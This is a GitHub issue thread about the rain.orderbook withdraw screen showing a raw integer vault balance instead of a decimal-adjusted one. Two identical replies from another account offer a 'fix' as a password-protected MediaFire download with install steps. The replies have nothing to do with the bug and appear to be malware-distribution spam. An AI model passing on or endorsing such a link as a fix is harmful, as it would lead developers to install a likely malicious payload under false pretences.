### ISSUE TITLE
Vault balance is displayed wrong on withdraw

### ISSUE THREAD

**Issue by hardyjosh** [rainlanguage/rain.orderbook#813]
The vault balance is showing the int amount not the amount adjusted for token decimals:

Also this should say "Vault Balance" so not to be confused with the wallet balance.

![telegram-cloud-photo-size-2-5368525184186835768-y](https://github.com/user-attachments/assets/494b51c9-8a88-48e9-ad3e-f02bebd59165)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
